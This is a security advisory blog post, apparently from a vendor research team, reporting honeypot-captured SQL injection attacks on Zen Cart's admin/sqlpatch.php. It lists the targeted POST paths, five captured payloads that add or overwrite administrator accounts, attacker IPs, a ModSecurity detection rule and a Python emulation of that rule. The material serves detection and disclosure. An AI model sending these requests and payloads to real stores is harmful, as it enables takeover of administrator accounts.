Our web honeypot sensors picked up attacks aimed at exploiting a Zen Cart SQL Injection vulnerability.
The attacks send a POST request to the following URLs:
POST /admin/sqlpatch.php/password_forgotten.php?action=execute
POST /black_market/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /cart/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /product_info.php/products_id/1658/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /shop/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /shopping/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /store/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /tienda/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /tradeshow/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /zencart/admin/sqlpatch.php/password_forgotten.php?action=execute
The attacks include a POST body parameter called "query_string" that carried the following different payloads:
insert into `admin` ( `admin_id`, `admin_name`, `admin_email`, `admin_pass`, `admin_level` ) values ( '2112', 'jembot', 'adm.net', 'abc22a464d79887aeb11486b74081fb5:3d', '0' );'
insert into admin (admin_id, admin_name, admin_email, admin_pass) values (666, 'nobody', 'crew.tools43@yahoo.com', '21232f297a57a5a743894a0e4a801fc3:be');'
insert into admin values (12, 'sales', 'admin@localhost', '351683ea4e19efe34874b501fdbf9792:9b', 1);'
show tables;'
update admin set admin_name='adminz', admin_email='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' where admin_id='1';'
As you can see, the attacker(s) are attempting to add new administrator account records to the "admin" table in the back-end Zen Cart database (and, in the last payload, to overwrite the existing admin_id 1 account).
There were a total of 116 attack requests detected from 4 source IP addresses:
125.165.165.31
173.230.128.50
193.107.86.145
209.239.114.225
These attacks are detected by the following ModSecurity rule from our SpiderLabs Commercial Rules Feed, which targets SQL Injection attacks against this Zen Cart vulnerability:
#
# (2055343) ModSecurity Rules from Trustwave SpiderLabs: Zen Cart admin/sqlpatch.php query_string Parameter SQL Injection
#
SecRule REQUEST_LINE "@contains admin/sqlpatch.php" "chain,phase:2,block,rev:'031312',t:none,t:urlDecodeUni,capture,logdata:'%{args.query_string}',severity:'2',id:2055343,msg:'SLR: Zen Cart admin/sqlpatch.php query_string Parameter SQL Injection',tag:'WEB_ATTACK/SQL_INJECTION',tag:'http://osvdb.org/show/osvdb/55343'"
SecRule "ARGS:query_string" "@pm # \" /* */ ` ' ( ) ; --" "ctl:auditLogParts=+E"
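To show how the chained rule above fires on this traffic, here is an added Python emulation of its two checks (the @contains test on the request line, then the @pm token list on ARGS:query_string) run over constructed sample requests. It is not SpiderLabs code or the ModSecurity engine, and it simplifies t:urlDecodeUni to standard percent-decoding.

```python
from urllib.parse import parse_qs, unquote

# Emulation of chained rule 2055343 (added example, not the real rule engine).
# Rule 1: the request line must contain "admin/sqlpatch.php".
TARGET_PATH = "admin/sqlpatch.php"
# Rule 2: the @pm phrase list applied to ARGS:query_string.
PM_TOKENS = ["#", '"', "/*", "*/", "`", "'", "(", ")", ";", "--"]

def matches_rule_2055343(request_line, body):
    """Return (hit, logdata). Both SecRule lines of the chain must match."""
    # t:urlDecodeUni before @contains; unquote() only handles %XX forms here.
    if TARGET_PATH not in unquote(request_line):
        return False, None
    # ARGS:query_string comes from the form-encoded POST body.
    args = parse_qs(body, keep_blank_values=True)
    query_string = args.get("query_string", [""])[0]
    hit = any(tok in query_string for tok in PM_TOKENS)
    # logdata:'%{args.query_string}' records the offending value on a hit.
    return hit, (query_string if hit else None)

# Constructed sample traffic: honeypot-style paths and payloads from the post,
# plus requests that must NOT trigger the rule.
SAMPLES = [
    ("POST /zencart/admin/sqlpatch.php/password_forgotten.php?action=execute HTTP/1.1",
     "query_string=show+tables%3B%27"),
    ("POST /shop/admin/sqlpatch.php/password_forgotten.php?action=execute HTTP/1.1",
     "query_string=insert+into+admin+values+%2812%2C+%27sales%27%2C+%27admin%40localhost%27%2C+%27x%27%2C+1%29%3B%27"),
    ("POST /admin/sqlpatch.php/password_forgotten.php?action=execute HTTP/1.1",
     "query_string=select+1"),            # path matches, no @pm token: chain breaks
    ("POST /admin/login.php HTTP/1.1",
     "query_string=show+tables%3B"),     # tokens present, but wrong path
]

def scan(samples):
    """Return (request_line, logdata) for every request the rule would block."""
    blocked = []
    for request_line, body in samples:
        hit, logdata = matches_rule_2055343(request_line, body)
        if hit:
            blocked.append((request_line, logdata))
    return blocked

if __name__ == "__main__":
    for line, data in scan(SAMPLES):
        print("BLOCK", line, "->", data)
```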

First off, Ryan, thank you so much for your excellent work over the years.
Three of the four source IPs you listed belong to companies that typically are responsive to abuse reports per our own experience -- http://www.dynamicnet.net/2011/08/security-snitching/
PT. TELKOM INDONESIA -- 125.165.165.31 -- tends to be hit and miss for being responsive.
Do you or any member of your team file abuse reports when you track such attacks?
Thank you.
Posted by: Dynamicnet | 15 March 2012 at 07:51